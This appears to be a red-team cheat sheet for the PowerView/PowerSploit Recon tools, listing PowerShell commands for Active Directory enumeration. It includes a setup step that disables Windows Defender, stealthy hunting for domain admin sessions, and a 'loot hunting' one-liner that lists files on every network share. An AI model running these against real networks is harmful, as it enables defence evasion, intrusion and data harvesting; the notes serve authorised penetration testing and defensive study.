PowerView
Setup
Download PowerSploit and/or Recon folder/module here:
https://github.com/PowerShellMafia/PowerSploit/tree/dev
Copy to Folder Path: C:\Windows\System32\WindowsPowerShell\v1.0\Modules
Add folders as exculsions or disable windows defender
Set unrestricted PowerShell execution policy:
Set-ExecutionPolicy -ExecutionPolicy Unrestricted
Import PowerSploit and/or Recon module:
Import-Module Recon
Domain Info
Display Current Domain
Get-NetDomain
Get-NetDomain -Domain <DomainName>
Display Verbose Domain Info
Get-ADDomain
Get-ADDomain -Domain <DomainName>
Get Domain SID
Get-DomainSID
Get Domain Controllers
Get-ADDomainController
Get-NetDomainController
Get-NetDomainController -Identity <DomainName>
Detailed Domain Info
Get Domain Policy (might be deprecated)
Get-DomainPolicy
Get Domain Shares
Find-DomainShare
Find-DomainShare -CheckShareAccess
Get GPOs
Get-NetGPO
Get-NetGPO -ComputerName <Name of the PC>
Get-NetGPO -GPOname <GUID of GPO>
Display OUs
Get-NetOU
Display ACLs
Get-ObjectAcl -SamAccountName <Account Name> -ResolveGUIDs
Find Interesting Access Control Entries
Invoke-ACLScanner -ResolveGUIDs
Display ACL of Specified Path
Get-PathAcl -Path "\\Path\Of\A\Share"
Display Domains of Forest
Get-NetForestDomain
Display Domain Trust (may be deprecated)
Get-ADTrust -Filter *
Get-ADTrust -Identity <DomainName>
Display Local AppLocker Effective Policy
Get-AppLockerPolicy -Effective
Computer Info
Display Domain Computers
Get-ADComputer -Filter * -Properties *
More Detailed All Computer Info
Get-NetComputer
User Info
Get User Info
Get-NetUser
Get-NetUser -SamAccountName <user>
Get-NetUser | select cn
Get Logged on User Info
Get-NetLoggedon -ComputerName <ComputerName>
Get Session Info for Machine
Get-NetSession -ComputerName <ComputerName>
Get Machines Where Current User is Logged In
Find-DomainUserLocation
Get Detailed User Info
Get-ADUser -Properties * -Filter *
Group Info
Get Members of a Specified Group
Get-DomainGroup -Identity <GroupName> | Select-Object -ExpandProperty Member
Display All Groups
Get-NetGroup
Display Detailed Info on All Groups
Get-ADGroup -Properties * -Filter *
User Hunting
Find all Machines Where Current User is Local Admin
Find-LocalAdminAccess -Verbose
Find Local Admins on Machines
Invoke-EnumerateLocalAdmin -Verbose
Find Machines Where Domain Admin or Specified User Has Session
Invoke-UserHunter
Invoke-UserHunter -GroupName <GroupName>
Invoke-UserHunter -CheckAccess
Invoke-UserHunter -Stealth
Loot Hunting
Use Domain Account to download list of all filenames in the network
Invoke-ShareFinderThreaded -ExcludedShares IPC$,PRINT$,ADMIN$ |
select-string '^(.*) \t-' | %{dir -recurse $_.Matches[0].Groups[1] |
select fullname | out-file -append files.txt}
PowerView Resources
https://powersploit.readthedocs.io/en/latest/Recon/
https://github.com/PowerShellMafia/PowerSploit/tree/master/Recon
https://gist.github.com/HarmJ0y/184f9822b195c52dd50c379ed3117993
https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerView
http://www.harmj0y.net/blog/tag/powerview/
http://www.harmj0y.net/blog/powershell/veil-powerview-a-usage-guide/
http://www.harmj0y.net/blog/redteaming/powerview-2-0/
http://www.harmj0y.net/blog/penetesting/i-hunt-sysadmins/
http://www.slideshare.net/harmj0y/i-have-the-powerview
https://adsecurity.org/?p=2535
https://www.youtube.com/watch?v=rpwrKhgMd7E
Powerview like program for systems without powershell https://github.com/mubix/netview https://www.hackingarticles.in/active-directory-enumeration-powerview/
Last updated
Was this helpful?